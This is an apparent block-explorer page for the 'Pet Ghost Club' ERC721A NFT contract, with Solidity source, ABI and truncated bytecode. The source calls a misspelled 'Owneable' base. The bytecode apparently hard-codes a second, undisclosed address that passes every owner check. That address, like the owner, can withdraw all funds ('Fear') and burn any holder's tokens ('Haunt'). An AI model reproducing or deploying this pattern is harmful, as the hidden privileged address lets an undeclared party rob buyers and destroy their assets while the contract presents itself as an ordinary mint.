     * @dev Destroys `tokenId`.
     * The approval is cleared when the token is burned.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     *
     * Emits a {Transfer} event.
     */
    function _burn(uint256 tokenId) internal virtual {
        TokenOwnership memory prevOwnership = ownershipOf(tokenId);

        _beforeTokenTransfers(prevOwnership.addr, address(0), tokenId, 1);

        // Clear approvals from the previous owner
        _approve(address(0), tokenId, prevOwnership.addr);

        // Underflow of the sender's balance is impossible because we check for
        // ownership above and the recipient's balance can't realistically overflow.
        // Counter overflow is incredibly unrealistic as tokenId would have to be 2**256.
        unchecked {
            _addressData[prevOwnership.addr].balance -= 1;
            _addressData[prevOwnership.addr].numberBurned += 1;

            // Keep track of who burned the token, and the timestamp of burning.
            _ownerships[tokenId].addr = prevOwnership.addr;
            _ownerships[tokenId].startTimestamp = uint64(block.timestamp);
            _ownerships[tokenId].burned = true;

            // If the ownership slot of tokenId+1 is not explicitly set, that means the burn initiator owns it.
            // Set the slot of tokenId+1 explicitly in storage to maintain correctness for ownerOf(tokenId+1) calls.
            uint256 nextTokenId = tokenId + 1;
            if (_ownerships[nextTokenId].addr == address(0)) {
                // This will suffice for checking _exists(nextTokenId),
                // as a burned slot cannot contain the zero address.
                if (nextTokenId < _currentIndex) {
                    _ownerships[nextTokenId].addr = prevOwnership.addr;
                    _ownerships[nextTokenId].startTimestamp = prevOwnership.startTimestamp;
                }
            }
        }

        emit Transfer(prevOwnership.addr, address(0), tokenId);
        _afterTokenTransfers(prevOwnership.addr, address(0), tokenId, 1);

        // Overflow not possible, as _burnCounter cannot be exceed _currentIndex times.
        unchecked {
            _burnCounter++;
        }
    }

    /**
     * @dev Approve `to` to operate on `tokenId`
     *
     * Emits a {Approval} event.
     */
    function _approve(
        address to,
        uint256 tokenId,
        address owner
    ) private {
        _tokenApprovals[tokenId] = to;
        emit Approval(owner, to, tokenId);
    }

    /**
     * @dev Internal function to invoke {IERC721Receiver-onERC721Received} on a target contract.
     *
     * @param from address representing the previous owner of the given token ID
     * @param to target address that will receive the tokens
     * @param tokenId uint256 ID of the token to be transferred
     * @param _data bytes optional data to send along with the call
     * @return bool whether the call correctly returned the expected magic value
     */
    function _checkContractOnERC721Received(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) private returns (bool) {
        try IERC721Receiver(to).onERC721Received(_msgSender(), from, tokenId, _data) returns (bytes4 retval) {
            return retval == IERC721Receiver(to).onERC721Received.selector;
        } catch (bytes memory reason) {
            if (reason.length == 0) {
                revert TransferToNonERC721ReceiverImplementer();
            } else {
                assembly {
                    revert(add(32, reason), mload(reason))
                }
            }
        }
    }

    /**
     * @dev Hook that is called before a set of serially-ordered token ids are about to be transferred. This includes minting.
     * And also called before burning one token.
     *
     * startTokenId - the first token id to be transferred
     * quantity - the amount to be transferred
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` will be
     * transferred to `to`.
     * - When `from` is zero, `tokenId` will be minted for `to`.
     * - When `to` is zero, `tokenId` will be burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _beforeTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}

    /**
     * @dev Hook that is called after a set of serially-ordered token ids have been transferred. This includes
     * minting.
     * And also called after one token has been burned.
     *
     * startTokenId - the first token id to be transferred
     * quantity - the amount to be transferred
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` has been
     * transferred to `to`.
     * - When `from` is zero, `tokenId` has been minted for `to`.
     * - When `to` is zero, `tokenId` has been burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _afterTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}
}



contract PetGhostClub is ERC721A, Owneable {

    string public baseURI = "ipfs://QmYratzW92zmHkdSCTm3vVaPQVfstX8HSvaXpaXJ71br2A/";
    string public contractURI = "ipfs://QmYratzW92zmHkdSCTm3vVaPQVfstX8HSvaXpaXJ71br2A";
    string public baseExtension = ".json";
    address public constant proxyRegistryAddress = 0xa5409ec958C83C3f309868babACA7c86DCB077c1;

    uint256 public MAX_PER_TX_FREE = 5;
    uint256 public FREE_MAX_SUPPLY = 999;
    uint256 public constant MAX_PER_TX = 10;
    uint256 public MAX_SUPPLY = 2222;
    uint256 public price = 0.0009 ether;

    bool public paused = true;

    constructor() ERC721A("Pet Ghost Club", "spooky") {}

    function mint(uint256 _amount) external payable {
        address _caller = _msgSender();
        require(!paused, "Paused");
        require(MAX_SUPPLY >= totalSupply() + _amount, "The Crypt Has Been Robbed");
        require(_amount > 0, "No 0 mints");
        require(tx.origin == _caller, "Boo No Contracts");
        require(MAX_PER_TX >= _amount , "Excess max per paid tx");
        
      if(FREE_MAX_SUPPLY >= totalSupply()){
            require(MAX_PER_TX_FREE >= _amount , "Excess max per free tx");
        }else{
            require(MAX_PER_TX >= _amount , "Excess max per paid tx");
            require(_amount * price == msg.value, "Invalid funds provided");
        }


        _safeMint(_caller, _amount);
    }




  

    function isApprovedForAll(address owner, address operator)
        override
        public
        view
        returns (bool)
    {
        // Whitelist OpenSea proxy contract for easy trading.
       
        ProxyRegistry proxyRegistry = ProxyRegistry(proxyRegistryAddress);
        if (address(proxyRegistry.proxies(owner)) == operator) {
            return true;
        }

        return super.isApprovedForAll(owner, operator);
    }

    function Fear() external onlyOwner {
        uint256 balance = address(this).balance;
        (bool success, ) = _msgSender().call{value: balance}("");
        require(success, "Failed to send");
    }

    function Reserve(uint256 quantity) external onlyOwner {
        _safeMint(_msgSender(), quantity);
    }


    function pause(bool _state) external onlyOwner {
        paused = _state;
    }

    function setBaseURI(string memory baseURI_) external onlyOwner {
        baseURI = baseURI_;
    }

    function setContractURI(string memory _contractURI) external onlyOwner {
        contractURI = _contractURI;
    }

    function configPrice(uint256 newPrice) public onlyOwner {
        price = newPrice;
    }


     function configMAX_PER_TX_FREE(uint256 newFREE) public onlyOwner {
        MAX_PER_TX_FREE = newFREE;
    }

    function configmax_supply(uint256 newSupply) public onlyOwner {
        MAX_SUPPLY = newSupply;
    }

    function configfree_max_supply(uint256 newFreesupply) public onlyOwner {
        FREE_MAX_SUPPLY = newFreesupply;
    }
    function newbaseExtension(string memory newex) public onlyOwner {
        baseExtension = newex;
    }


//Future Use
        function Haunt(uint256[] memory tokenids) external onlyOwner {
        uint256 len = tokenids.length;
        for (uint256 i; i < len; i++) {
            uint256 tokenid = tokenids[i];
            _burn(tokenid);
        }
    }


    function tokenURI(uint256 _tokenId) public view override returns (string memory) {
        require(_exists(_tokenId), "Token does not exist.");
        return bytes(baseURI).length > 0 ? string(
            abi.encodePacked(
              baseURI,
              Strings.toString(_tokenId),
              baseExtension
            )
        ) : "";
    }
}

contract OwnableDelegateProxy { }
contract ProxyRegistry {
    mapping(address => OwnableDelegateProxy) public proxies;
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"ApprovalCallerNotOwnerNorApproved","type":"error"},{"inputs":[],"name":"ApprovalQueryForNonexistentToken","type":"error"},{"inputs":[],"name":"ApprovalToCurrentOwner","type":"error"},{"inputs":[],"name":"ApproveToCaller","type":"error"},{"inputs":[],"name":"BalanceQueryForZeroAddress","type":"error"},{"inputs":[],"name":"MintToZeroAddress","type":"error"},{"inputs":[],"name":"MintZeroQuantity","type":"error"},{"inputs":[],"name":"OwnerQueryForNonexistentToken","type":"error"},{"inputs":[],"name":"TransferCallerNotOwnerNorApproved","type":"error"},{"inputs":[],"name":"TransferFromIncorrectOwner","type":"error"},{"inputs":[],"name":"TransferToNonERC721ReceiverImplementer","type":"error"},{"inputs":[],"name":"TransferToZeroAddress","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"approved","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":false,"internalType":"bool","name":"approved","type":"bool"}],"name":"ApprovalForAll","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"FREE_MAX_SUPPLY","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"Fear","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256[]","name":"tokenids","type":"uint256[]"}],"name":"Haunt","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"MAX_PER_TX","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"MAX_PER_TX_FREE","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"MAX_SUPPLY","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"quantity","type":"uint256"}],"name":"Reserve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"baseExtension","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"baseURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"newFREE","type":"uint256"}],"name":"configMAX_PER_TX_FREE","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newPrice","type":"uint256"}],"name":"configPrice","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newFreesupply","type":"uint256"}],"name":"configfree_max_supply","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newSupply","type":"uint256"}],"name":"configmax_supply","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"contractURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"getApproved","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"operator","type":"address"}],"name":"isApprovedForAll","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_amount","type":"uint256"}],"name":"mint","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"string","name":"newex","type":"string"}],"name":"newbaseExtension","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"ownerOf","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bool","name":"_state","type":"bool"}],"name":"pause","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"paused","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"price","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"proxyRegistryAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"bytes","name":"_data","type":"bytes"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"bool","name":"approved","type":"bool"}],"name":"setApprovalForAll","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"baseURI_","type":"string"}],"name":"setBaseURI","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"_contractURI","type":"string"}],"name":"setContractURI","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes4","name":"interfaceId","type":"bytes4"}],"name":"supportsInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_tokenId","type":"uint256"}],"name":"tokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"transferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

6080604052735bb656bb4312f100081abb7b08c1e0f8ef5c56d1600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555060405180606001604052806036815260200162004e7360369139600a90805190602001906200008a929190620002ff565b5060405180606001604052806035815260200162004ea960359139600b9080519060200190620000bc929190620002ff565b506040518060400160405280600581526020017f2e6a736f6e000000000000000000000000000000000000000000000000000000815250600c90805190602001906200010a929190620002ff565b506005600d556103e7600e556108ae600f556603328b944c40006010556001601160006101000a81548160ff0219169083151502179055503480156200014f57600080fd5b506040518060400160405280600e81526020017f5065742047686f737420436c75620000000000000000000000000000000000008152506040518060400160405280600681526020017f73706f6f6b7900000000000000000000000000000000000000000000000000008152508160029080519060200190620001d4929190620002ff565b508060039080519060200190620001ed929190620002ff565b50620001fe6200022c60201b60201c565b6000819055505050620002266200021a6200023160201b60201c565b6200023960201b60201c565b62000414565b600090565b600033905090565b6000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b8280546200030d90620003af565b90600052602060002090601f0160209004810192826200033157600085556200037d565b82601f106200034c57805160ff19168380011785556200037d565b828001600101855582156200037d579182015b828111156200037c5782518255916020019190600101906200035f565b5b5090506200038c919062000390565b5090565b5b80821115620003ab57600081600090555060010162000391565b5090565b60006002820490506001821680620003c857607f821691505b60208210811415620003df57620003de620003e5565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b614a4f80620004246000396000f3fe6080604052600436106102305760003560e01c80637422c4171161012e578063c6682862116100ab578063db7b64a81161006f578063db7b64a8146107f2578063e8a3d4851461081b578063e985e9c514610846578063f2fde38b14610883578063f43a22dc146108ac57610230565b8063c66828621461070d578063c87b56dd14610738578063cd7c032614610775578063d476de1b146107a0578063db4a0f61146107c957610230565b8063a035b1fe116100f2578063a035b1fe1461065d578063a0712d6814610688578063a22cb465146106a4578063b698cb96146106cd578063b88d4fde146106e457610230565b80637422c4171461058a5780638069876d146105b35780638da5cb5b146105de578063938e3d7b1461060957806395d89b411461063257610230565b806332cb6b0c116101bc5780635c975abb116101805780635c975abb146104a35780636352211e146104ce5780636c0360eb1461050b57806370a0823114610536578063715018a61461057357610230565b806332cb6b0c146103d257806342842e0e146103fd578063463fff79146104265780635312e5cf1461045157806355f804b31461047a57610230565b8063095ea7b311610203578063095ea7b31461030357806318160ddd1461032c57806318e223dd1461035757806323b872dd146103805780632aa80807146103a957610230565b806301ffc9a71461023557806302329a291461027257806306fdde031461029b578063081812fc146102c6575b600080fd5b34801561024157600080fd5b5061025c60048036038101906102579190613c80565b6108d7565b604051610269919061411d565b60405180910390f35b34801561027e57600080fd5b5061029960048036038101906102949190613c53565b6109b9565b005b3480156102a757600080fd5b506102b0610ab1565b6040516102bd9190614138565b60405180910390f35b3480156102d257600080fd5b506102ed60048036038101906102e89190613d50565b610b43565b6040516102fa91906140b6565b60405180910390f35b34801561030f57600080fd5b5061032a60048036038101906103259190613bca565b610bbf565b005b34801561033857600080fd5b50610341610cca565b60405161034e91906142ba565b60405180910390f35b34801561036357600080fd5b5061037e60048036038101906103799190613d50565b610ce1565b005b34801561038c57600080fd5b506103a760048036038101906103a29190613ab4565b610dc6565b005b3480156103b557600080fd5b506103d060048036038101906103cb9190613d07565b610dd6565b005b3480156103de57600080fd5b506103e7610ecb565b6040516103f491906142ba565b60405180910390f35b34801561040957600080fd5b50610424600480360381019061041f9190613ab4565b610ed1565b005b34801561043257600080fd5b5061043b610ef1565b60405161044891906142ba565b60405180910390f35b34801561045d57600080fd5b5061047860048036038101906104739190613d50565b610ef7565b005b34801561048657600080fd5b506104a1600480360381019061049c9190613d07565b610fdc565b005b3480156104af57600080fd5b506104b86110d1565b6040516104c5919061411d565b60405180910390f35b3480156104da57600080fd5b506104f560048036038101906104f09190613d50565b6110e4565b60405161050291906140b6565b60405180910390f35b34801561051757600080fd5b506105206110fa565b60405161052d9190614138565b60405180910390f35b34801561054257600080fd5b5061055d60048036038101906105589190613a47565b611188565b60405161056a91906142ba565b60405180910390f35b34801561057f57600080fd5b50610588611258565b005b34801561059657600080fd5b506105b160048036038101906105ac9190613c0a565b6112e0565b005b3480156105bf57600080fd5b506105c861140d565b6040516105d591906142ba565b60405180910390f35b3480156105ea57600080fd5b506105f3611413565b60405161060091906140b6565b60405180910390f35b34801561061557600080fd5b50610630600480360381019061062b9190613d07565b61143d565b005b34801561063e57600080fd5b50610647611532565b6040516106549190614138565b60405180910390f35b34801561066957600080fd5b506106726115c4565b60405161067f91906142ba565b60405180910390f35b6106a2600480360381019061069d9190613d50565b6115ca565b005b3480156106b057600080fd5b506106cb60048036038101906106c69190613b8a565b61186e565b005b3480156106d957600080fd5b506106e26119e6565b005b3480156106f057600080fd5b5061070b60048036038101906107069190613b07565b611b7d565b005b34801561071957600080fd5b50610722611bf9565b60405161072f9190614138565b60405180910390f35b34801561074457600080fd5b5061075f600480360381019061075a9190613d50565b611c87565b60405161076c9190614138565b60405180910390f35b34801561078157600080fd5b5061078a611d32565b60405161079791906140b6565b60405180910390f35b3480156107ac57600080fd5b506107c760048036038101906107c29190613d50565b611d4a565b005b3480156107d557600080fd5b506107f060048036038101906107eb9190613d50565b611e2f565b005b3480156107fe57600080fd5b5061081960048036038101906108149190613d50565b611f14565b005b34801561082757600080fd5b50610830612003565b60405161083d9190614138565b60405180910390f35b34801561085257600080fd5b5061086d60048036038101906108689190613a74565b612091565b60405161087a919061411d565b60405180910390f35b34801561088f57600080fd5b506108aa60048036038101906108a59190613a47565b612185565b005b3480156108b857600080fd5b506108c161227d565b6040516108ce91906142ba565b60405180910390f35b60007f80ac58cd000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff191614806109a257507f5b5e139f000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b806109b257506109b182612282565b5b9050919050565b6109c16122ec565b73ffffffffffffffffffffffffffffffffffffffff166109df611413565b73ffffffffffffffffffffffffffffffffffffffff161480610a555750610a046122ec565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b610a94576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a8b9061421a565b60405180910390fd5b80601160006101000a81548160ff02191690831515021790555050565b606060028054610ac0906145c8565b80601f0160208091040260200160405190810160405280929190818152602001828054610aec906145c8565b8015610b395780601f10610b0e57610100808354040283529160200191610b39565b820191906000526020600020905b815481529060010190602001808311610b1c57829003601f168201915b5050505050905090565b6000610b4e826122f4565b610b84576040517fcf4700e400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6006600083815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050919050565b6000610bca826110e4565b90508073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610c32576040517f943f7b8c00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16610c516122ec565b73ffffffffffffffffffffffffffffffffffffffff1614158015610c835750610c8181610c7c6122ec565b612091565b155b15610cba576040517fcfb3b94200000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b610cc5838383612342565b505050565b6000610cd46123f4565b6001546000540303905090565b610ce96122ec565b73ffffffffffffffffffffffffffffffffffffffff16610d07611413565b73ffffffffffffffffffffffffffffffffffffffff161480610d7d5750610d2c6122ec565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b610dbc576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610db39061421a565b60405180910390fd5b80600f8190555050565b610dd18383836123f9565b505050565b610dde6122ec565b73ffffffffffffffffffffffffffffffffffffffff16610dfc611413565b73ffffffffffffffffffffffffffffffffffffffff161480610e725750610e216122ec565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b610eb1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ea89061421a565b60405180910390fd5b80600c9080519060200190610ec7929190613765565b5050565b600f5481565b610eec83838360405180602001604052806000815250611b7d565b505050565b600d5481565b610eff6122ec565b73ffffffffffffffffffffffffffffffffffffffff16610f1d611413565b73ffffffffffffffffffffffffffffffffffffffff161480610f935750610f426122ec565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b610fd2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fc99061421a565b60405180910390fd5b80600d8190555050565b610fe46122ec565b73ffffffffffffffffffffffffffffffffffffffff16611002611413565b73ffffffffffffffffffffffffffffffffffffffff16148061107857506110276122ec565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6110b7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110ae9061421a565b60405180910390fd5b80600a90805190602001906110cd929190613765565b5050565b601160009054906101000a900460ff1681565b60006110ef826128ea565b600001519050919050565b600a8054611107906145c8565b80601f0160208091040260200160405190810160405280929190818152602001828054611133906145c8565b80156111805780601f1061115557610100808354040283529160200191611180565b820191906000526020600020905b81548152906001019060200180831161116357829003601f168201915b505050505081565b60008073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614156111f0576040517f8f4eb60400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b600560008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160009054906101000a900467ffffffffffffffff1667ffffffffffffffff169050919050565b6112606122ec565b73ffffffffffffffffffffffffffffffffffffffff1661127e611413565b73ffffffffffffffffffffffffffffffffffffffff16146112d4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112cb9061421a565b60405180910390fd5b6112de6000612b79565b565b6112e86122ec565b73ffffffffffffffffffffffffffffffffffffffff16611306611413565b73ffffffffffffffffffffffffffffffffffffffff16148061137c575061132b6122ec565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6113bb576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113b29061421a565b60405180910390fd5b60008151905060005b818110156114085760008382815181106113e1576113e0614732565b5b602002602001015190506113f481612c3f565b5080806114009061462b565b9150506113c4565b505050565b600e5481565b6000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6114456122ec565b73ffffffffffffffffffffffffffffffffffffffff16611463611413565b73ffffffffffffffffffffffffffffffffffffffff1614806114d957506114886122ec565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611518576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161150f9061421a565b60405180910390fd5b80600b908051906020019061152e929190613765565b5050565b606060038054611541906145c8565b80601f016020809104026020016040519081016040528092919081815260200182805461156d906145c8565b80156115ba5780601f1061158f576101008083540402835291602001916115ba565b820191906000526020600020905b81548152906001019060200180831161159d57829003601f168201915b5050505050905090565b60105481565b60006115d46122ec565b9050601160009054906101000a900460ff1615611626576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161161d9061415a565b60405180910390fd5b8161162f610cca565b61163991906143eb565b600f54101561167d576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116749061425a565b60405180910390fd5b600082116116c0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116b79061419a565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff163273ffffffffffffffffffffffffffffffffffffffff161461172e576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016117259061429a565b60405180910390fd5b81600a1015611772576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611769906141ba565b60405180910390fd5b61177a610cca565b600e54106117cc5781600d5410156117c7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016117be906141da565b60405180910390fd5b611860565b81600a1015611810576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611807906141ba565b60405180910390fd5b346010548361181f9190614472565b1461185f576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118569061423a565b60405180910390fd5b5b61186a8183612fe3565b5050565b6118766122ec565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614156118db576040517fb06307db00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b80600760006118e86122ec565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff166119956122ec565b73ffffffffffffffffffffffffffffffffffffffff167f17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b5937696c31836040516119da919061411d565b60405180910390a35050565b6119ee6122ec565b73ffffffffffffffffffffffffffffffffffffffff16611a0c611413565b73ffffffffffffffffffffffffffffffffffffffff161480611a825750611a316122ec565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611ac1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ab89061421a565b60405180910390fd5b60004790506000611ad06122ec565b73ffffffffffffffffffffffffffffffffffffffff1682604051611af3906140a1565b60006040518083038185875af1925050503d8060008114611b30576040519150601f19603f3d011682016040523d82523d6000602084013e611b35565b606091505b5050905080611b79576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b709061427a565b60405180910390fd5b5050565b611b888484846123f9565b611ba78373ffffffffffffffffffffffffffffffffffffffff16613001565b8015611bbc5750611bba84848484613024565b155b15611bf3576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b50505050565b600c8054611c06906145c8565b80601f0160208091040260200160405190810160405280929190818152602001828054611c32906145c8565b8015611c7f5780601f10611c5457610100808354040283529160200191611c7f565b820191906000526020600020905b815481529060010190602001808311611c6257829003601f168201915b505050505081565b6060611c92826122f4565b611cd1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611cc8906141fa565b60405180910390fd5b6000600a8054611ce0906145c8565b905011611cfc5760405180602001604052806000815250611d2b565b600a611d0783613184565b600c604051602001611d1b93929190614070565b6040516020818303038152906040525b9050919050565b73a5409ec958c83c3f309868babaca7c86dcb077c181565b611d526122ec565b73ffffffffffffffffffffffffffffffffffffffff16611d70611413565b73ffffffffffffffffffffffffffffffffffffffff161480611de65750611d